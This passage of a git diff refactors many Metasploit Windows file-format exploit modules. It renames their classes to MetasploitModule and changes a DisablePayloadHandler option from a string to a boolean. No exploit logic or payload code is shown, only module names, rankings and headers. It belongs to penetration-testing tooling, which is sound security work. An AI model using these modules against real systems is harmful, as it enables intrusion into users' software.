--- a/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb +++ b/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_utilprintf.rb b/modules/exploits/windows/fileformat/adobe_utilprintf.rb index 03dda02143..307fefe4e6 100644 --- a/modules/exploits/windows/fileformat/adobe_utilprintf.rb +++ b/modules/exploits/windows/fileformat/adobe_utilprintf.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/allplayer_m3u_bof.rb b/modules/exploits/windows/fileformat/allplayer_m3u_bof.rb index 396176bf0d..9321d5dbc4 100644 --- a/modules/exploits/windows/fileformat/allplayer_m3u_bof.rb +++ b/modules/exploits/windows/fileformat/allplayer_m3u_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/altap_salamander_pdb.rb b/modules/exploits/windows/fileformat/altap_salamander_pdb.rb index 4d85c1fae8..0862629e6e 100644 --- a/modules/exploits/windows/fileformat/altap_salamander_pdb.rb +++ b/modules/exploits/windows/fileformat/altap_salamander_pdb.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/aol_desktop_linktag.rb b/modules/exploits/windows/fileformat/aol_desktop_linktag.rb index d807274f3f..b64b1dba03 100644 --- a/modules/exploits/windows/fileformat/aol_desktop_linktag.rb 
+++ b/modules/exploits/windows/fileformat/aol_desktop_linktag.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/aol_phobos_bof.rb b/modules/exploits/windows/fileformat/aol_phobos_bof.rb index 53c044328a..fd2dddf5f8 100644 --- a/modules/exploits/windows/fileformat/aol_phobos_bof.rb +++ b/modules/exploits/windows/fileformat/aol_phobos_bof.rb @@ -29,7 +29,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/apple_quicktime_pnsize.rb b/modules/exploits/windows/fileformat/apple_quicktime_pnsize.rb index ed6dd402c0..e656115c4d 100644 --- a/modules/exploits/windows/fileformat/apple_quicktime_pnsize.rb +++ b/modules/exploits/windows/fileformat/apple_quicktime_pnsize.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/apple_quicktime_rdrf.rb b/modules/exploits/windows/fileformat/apple_quicktime_rdrf.rb index 3cb025d7c9..f52c94d008 100644 --- a/modules/exploits/windows/fileformat/apple_quicktime_rdrf.rb +++ b/modules/exploits/windows/fileformat/apple_quicktime_rdrf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/apple_quicktime_texml.rb b/modules/exploits/windows/fileformat/apple_quicktime_texml.rb index e2ef03ffb9..f8f8cb9c45 100644 --- a/modules/exploits/windows/fileformat/apple_quicktime_texml.rb +++ b/modules/exploits/windows/fileformat/apple_quicktime_texml.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/audio_coder_m3u.rb b/modules/exploits/windows/fileformat/audio_coder_m3u.rb index 677b09c960..b46808db8f 100644 --- a/modules/exploits/windows/fileformat/audio_coder_m3u.rb +++ b/modules/exploits/windows/fileformat/audio_coder_m3u.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/audio_wkstn_pls.rb b/modules/exploits/windows/fileformat/audio_wkstn_pls.rb index c59964b672..74d8300822 100644 --- a/modules/exploits/windows/fileformat/audio_wkstn_pls.rb +++ b/modules/exploits/windows/fileformat/audio_wkstn_pls.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/audiotran_pls.rb b/modules/exploits/windows/fileformat/audiotran_pls.rb index 098c82121b..43aa6646dc 100644 --- a/modules/exploits/windows/fileformat/audiotran_pls.rb +++ b/modules/exploits/windows/fileformat/audiotran_pls.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/audiotran_pls_1424.rb b/modules/exploits/windows/fileformat/audiotran_pls_1424.rb index 2d824873e9..7310aa459c 100644 --- a/modules/exploits/windows/fileformat/audiotran_pls_1424.rb +++ b/modules/exploits/windows/fileformat/audiotran_pls_1424.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb b/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb index cf3be4cdb6..41f0c09caa 100644 --- a/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb +++ b/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/bacnet_csv.rb b/modules/exploits/windows/fileformat/bacnet_csv.rb index dd284bb9b9..35d8e5431d 100644 --- a/modules/exploits/windows/fileformat/bacnet_csv.rb +++ b/modules/exploits/windows/fileformat/bacnet_csv.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb b/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb index 16f16399e7..27865cb896 100644 --- a/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb +++ b/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb @@ -5,7 +5,7 @@ require "msf/core" -class Metasploit4 < Msf::Exploit +class MetasploitModule < Msf::Exploit Rank = NormalRanking diff --git a/modules/exploits/windows/fileformat/blazedvd_hdtv_bof.rb b/modules/exploits/windows/fileformat/blazedvd_hdtv_bof.rb index 9cce4f1ed1..44b52c9745 100644 --- a/modules/exploits/windows/fileformat/blazedvd_hdtv_bof.rb +++ b/modules/exploits/windows/fileformat/blazedvd_hdtv_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT 
diff --git a/modules/exploits/windows/fileformat/blazedvd_plf.rb b/modules/exploits/windows/fileformat/blazedvd_plf.rb index e8e7b6feb9..1496c6bb45 100644 --- a/modules/exploits/windows/fileformat/blazedvd_plf.rb +++ b/modules/exploits/windows/fileformat/blazedvd_plf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/bpftp_client_bps_bof.rb b/modules/exploits/windows/fileformat/bpftp_client_bps_bof.rb index eb1382c2c9..4d501e88fc 100644 --- a/modules/exploits/windows/fileformat/bpftp_client_bps_bof.rb +++ b/modules/exploits/windows/fileformat/bpftp_client_bps_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/bsplayer_m3u.rb b/modules/exploits/windows/fileformat/bsplayer_m3u.rb index ac074a89b7..a651c57417 100644 --- a/modules/exploits/windows/fileformat/bsplayer_m3u.rb +++ b/modules/exploits/windows/fileformat/bsplayer_m3u.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ca_cab.rb b/modules/exploits/windows/fileformat/ca_cab.rb index a596d254fc..9fd6e8977a 100644 --- a/modules/exploits/windows/fileformat/ca_cab.rb +++ b/modules/exploits/windows/fileformat/ca_cab.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb b/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb index b9960e6c1d..7b13a94448 100644 
--- a/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb +++ b/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb b/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb index 2eddd04730..23a4802477 100644 --- a/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb +++ b/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/chasys_draw_ies_bmp_bof.rb b/modules/exploits/windows/fileformat/chasys_draw_ies_bmp_bof.rb index ead6de182e..6a250a4be3 100644 --- a/modules/exploits/windows/fileformat/chasys_draw_ies_bmp_bof.rb +++ b/modules/exploits/windows/fileformat/chasys_draw_ies_bmp_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/coolpdf_image_stream_bof.rb b/modules/exploits/windows/fileformat/coolpdf_image_stream_bof.rb index fd03303457..dc224d9809 100644 --- a/modules/exploits/windows/fileformat/coolpdf_image_stream_bof.rb +++ b/modules/exploits/windows/fileformat/coolpdf_image_stream_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/corelpdf_fusion_bof.rb b/modules/exploits/windows/fileformat/corelpdf_fusion_bof.rb index 672dd21363..6097c8fb34 100644 --- a/modules/exploits/windows/fileformat/corelpdf_fusion_bof.rb 
+++ b/modules/exploits/windows/fileformat/corelpdf_fusion_bof.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/csound_getnum_bof.rb b/modules/exploits/windows/fileformat/csound_getnum_bof.rb index 1e45c2bad9..50aaa3d7ed 100644 --- a/modules/exploits/windows/fileformat/csound_getnum_bof.rb +++ b/modules/exploits/windows/fileformat/csound_getnum_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/cutezip_bof.rb b/modules/exploits/windows/fileformat/cutezip_bof.rb index f27d29a44c..4cdb568852 100644 --- a/modules/exploits/windows/fileformat/cutezip_bof.rb +++ b/modules/exploits/windows/fileformat/cutezip_bof.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb b/modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb index 171aa77b96..4e643c9134 100644 --- a/modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb +++ b/modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/cytel_studio_cy3.rb b/modules/exploits/windows/fileformat/cytel_studio_cy3.rb index 74c7b8f7ea..27a7399113 100644 --- a/modules/exploits/windows/fileformat/cytel_studio_cy3.rb +++ b/modules/exploits/windows/fileformat/cytel_studio_cy3.rb 
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/deepburner_path.rb b/modules/exploits/windows/fileformat/deepburner_path.rb
index 76ce8452b6..81e7b4eb61 100644
--- a/modules/exploits/windows/fileformat/deepburner_path.rb
+++ b/modules/exploits/windows/fileformat/deepburner_path.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GreatRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/destinymediaplayer16.rb b/modules/exploits/windows/fileformat/destinymediaplayer16.rb
index 3535ec9342..e28c56775c 100644
--- a/modules/exploits/windows/fileformat/destinymediaplayer16.rb
+++ b/modules/exploits/windows/fileformat/destinymediaplayer16.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/digital_music_pad_pls.rb b/modules/exploits/windows/fileformat/digital_music_pad_pls.rb
index dde740dc05..5b4ab37f1d 100644
--- a/modules/exploits/windows/fileformat/digital_music_pad_pls.rb
+++ b/modules/exploits/windows/fileformat/digital_music_pad_pls.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/djstudio_pls_bof.rb b/modules/exploits/windows/fileformat/djstudio_pls_bof.rb
index ae6179ce9b..a23ea2c2ba 100644
--- a/modules/exploits/windows/fileformat/djstudio_pls_bof.rb
+++ b/modules/exploits/windows/fileformat/djstudio_pls_bof.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/djvu_imageurl.rb b/modules/exploits/windows/fileformat/djvu_imageurl.rb
index 1a4afb7f65..bb7f07e4d6 100644
--- a/modules/exploits/windows/fileformat/djvu_imageurl.rb
+++ b/modules/exploits/windows/fileformat/djvu_imageurl.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = LowRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/dvdx_plf_bof.rb b/modules/exploits/windows/fileformat/dvdx_plf_bof.rb
index 284effe31b..abf972e0bd 100644
--- a/modules/exploits/windows/fileformat/dvdx_plf_bof.rb
+++ b/modules/exploits/windows/fileformat/dvdx_plf_bof.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/easycdda_pls_bof.rb b/modules/exploits/windows/fileformat/easycdda_pls_bof.rb
index 5e22d75d04..cb3d17c4bf 100644
--- a/modules/exploits/windows/fileformat/easycdda_pls_bof.rb
+++ b/modules/exploits/windows/fileformat/easycdda_pls_bof.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb b/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb
index 48e04da124..9ebe304e14 100644
--- a/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb
+++ b/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = AverageRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/erdas_er_viewer_bof.rb b/modules/exploits/windows/fileformat/erdas_er_viewer_bof.rb
index f63cae9376..3922c36d9f 100644
--- a/modules/exploits/windows/fileformat/erdas_er_viewer_bof.rb
+++ b/modules/exploits/windows/fileformat/erdas_er_viewer_bof.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/erdas_er_viewer_rf_report_error.rb b/modules/exploits/windows/fileformat/erdas_er_viewer_rf_report_error.rb
index d1d7450d78..42a7a7b919 100644
--- a/modules/exploits/windows/fileformat/erdas_er_viewer_rf_report_error.rb
+++ b/modules/exploits/windows/fileformat/erdas_er_viewer_rf_report_error.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb b/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb
index c455d9abe3..e7c7606b63 100644
--- a/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb
+++ b/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/etrust_pestscan.rb b/modules/exploits/windows/fileformat/etrust_pestscan.rb
index 0985e0c229..f54e0fb9fb 100644
--- a/modules/exploits/windows/fileformat/etrust_pestscan.rb
+++ b/modules/exploits/windows/fileformat/etrust_pestscan.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = AverageRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/ezip_wizard_bof.rb b/modules/exploits/windows/fileformat/ezip_wizard_bof.rb
index e13df2b8f0..8d41735dfb 100644
--- a/modules/exploits/windows/fileformat/ezip_wizard_bof.rb
+++ b/modules/exploits/windows/fileformat/ezip_wizard_bof.rb
@@ -7,7 +7,7 @@
 require 'msf/core'
 require 'rex/zip'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/fatplayer_wav.rb b/modules/exploits/windows/fileformat/fatplayer_wav.rb
index 38686df93b..cf4f18cd37 100644
--- a/modules/exploits/windows/fileformat/fatplayer_wav.rb
+++ b/modules/exploits/windows/fileformat/fatplayer_wav.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/fdm_torrent.rb b/modules/exploits/windows/fileformat/fdm_torrent.rb
index df64e35035..835441a161 100644
--- a/modules/exploits/windows/fileformat/fdm_torrent.rb
+++ b/modules/exploits/windows/fileformat/fdm_torrent.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/feeddemon_opml.rb b/modules/exploits/windows/fileformat/feeddemon_opml.rb
index fd9a115fca..e19d9777bf 100644
--- a/modules/exploits/windows/fileformat/feeddemon_opml.rb
+++ b/modules/exploits/windows/fileformat/feeddemon_opml.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GreatRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb b/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb
index f5da05ca0a..db56b8840e 100644
--- a/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb
+++ b/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::FILEFORMAT
@@ -38,7 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote
 'DefaultOptions' =>
 {
 'EXITFUNC' => 'process',
- 'DisablePayloadHandler' => 'true',
+ 'DisablePayloadHandler' => true,
 },
 'Platform' => 'win',
 'Targets' =>
diff --git a/modules/exploits/windows/fileformat/foxit_reader_launch.rb b/modules/exploits/windows/fileformat/foxit_reader_launch.rb
index 1f9be2a724..512ca932fd 100644
--- a/modules/exploits/windows/fileformat/foxit_reader_launch.rb
+++ b/modules/exploits/windows/fileformat/foxit_reader_launch.rb
@@ -6,7 +6,7 @@
 require 'msf/core'
 require 'zlib'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::FILEFORMAT
@@ -36,7 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote
 'DefaultOptions' =>
 {
 'EXITFUNC' => 'process',
- 'DisablePayloadHandler' => 'true',
+ 'DisablePayloadHandler' => true,
 },
 'Payload' =>
 {
diff --git a/modules/exploits/windows/fileformat/foxit_title_bof.rb b/modules/exploits/windows/fileformat/foxit_title_bof.rb
index 166a9cfee8..9c9f4b3566 100644
--- a/modules/exploits/windows/fileformat/foxit_title_bof.rb
+++ b/modules/exploits/windows/fileformat/foxit_title_bof.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GreatRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb b/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb
index 9be4a7dc85..7dd33fd5e9 100644
--- a/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb
+++ b/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GreatRanking
 include Msf::Exploit::FILEFORMAT
@@ -36,7 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote
 'DefaultOptions' =>
 {
 'EXITFUNC' => 'process',
- 'DisablePayloadHandler' => 'true',
+ 'DisablePayloadHandler' => true,
 },
 'Payload' =>
 {
diff --git a/modules/exploits/windows/fileformat/galan_fileformat_bof.rb b/modules/exploits/windows/fileformat/galan_fileformat_bof.rb
index 7e82c08be2..1049ee46b0 100644
--- a/modules/exploits/windows/fileformat/galan_fileformat_bof.rb
+++ b/modules/exploits/windows/fileformat/galan_fileformat_bof.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::FILEFORMAT
@@ -32,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
 'DefaultOptions' =>
 {
 'EXITFUNC' => 'process',
- 'DisablePayloadHandler' => 'true',
+ 'DisablePayloadHandler' => true,
 },
 'Payload' =>
 {
diff --git a/modules/exploits/windows/fileformat/gsm_sim.rb b/modules/exploits/windows/fileformat/gsm_sim.rb
index e2019f38cc..0fd7b4a82e 100644
--- a/modules/exploits/windows/fileformat/gsm_sim.rb
+++ b/modules/exploits/windows/fileformat/gsm_sim.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/gta_samp.rb b/modules/exploits/windows/fileformat/gta_samp.rb
index 8fda60248c..99bfd109cf 100644
--- a/modules/exploits/windows/fileformat/gta_samp.rb
+++ b/modules/exploits/windows/fileformat/gta_samp.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb b/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb
index 541f6ac734..96e6b9cb59 100644
--- a/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb
+++ b/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::FILEFORMAT
@@ -31,7 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote
 'DefaultOptions' =>
 {
 'EXITFUNC' => 'process',
- 'DisablePayloadHandler' => 'true',
+ 'DisablePayloadHandler' => true,
 },
 'Payload' =>
 {
diff --git a/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb b/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb
index b7cb7a9e32..3eaa4f66bf 100644
--- a/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb
+++ b/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::FILEFORMAT
@@ -30,7 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote
 'DefaultOptions' =>
 {
 'EXITFUNC' => 'process',
- 'DisablePayloadHandler' => 'true',
+ 'DisablePayloadHandler' => true,
 },
 'Payload' =>
 {
diff --git a/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb b/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb
index 24ae5f20f2..90d48de952 100644
--- a/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb
+++ b/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::FILEFORMAT
@@ -31,7 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote
 'DefaultOptions' =>
 {
 'EXITFUNC' => 'process',
- 'DisablePayloadHandler' => 'true',
+ 'DisablePayloadHandler' => true,
 },
 'Payload' =>
 {
diff --git a/modules/exploits/windows/fileformat/homm3_h3m.rb b/modules/exploits/windows/fileformat/homm3_h3m.rb
